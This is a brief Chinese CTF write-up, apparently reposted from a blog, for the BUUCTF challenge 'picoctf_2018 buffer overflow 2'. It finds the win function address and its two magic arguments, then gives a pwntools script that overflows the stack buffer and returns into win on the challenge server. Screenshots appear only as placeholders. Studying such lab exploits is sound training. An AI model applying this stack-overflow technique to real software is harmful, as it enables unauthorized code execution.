[BUUCTF]PWN——picoctf_2018_buffer overflow 2

picoctf_2018_buffer overflow 2

例行检查,32位,开启NX保护
在这里插入图片描述
运行一下,
在这里插入图片描述
用IDA打开。看到了flag.txt,跟进一下。
在这里插入图片描述
win函数地址为0x80485cb
在这里插入图片描述

a1 == 0xDEADBEEF && a2 == 0xDEADC0DE 时,输出flag.

在这里插入图片描述

from pwn import*
r=remote('node3.buuoj.cn',26224)

payload='a'*(0x6c+4)+p32(0x80485cb)+p32(0)+p32(0xDEADBEEF)+p32(0xDEADC0DE)

r.sendline(payload)
r.interactive()

在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/BangSen1/article/details/115358552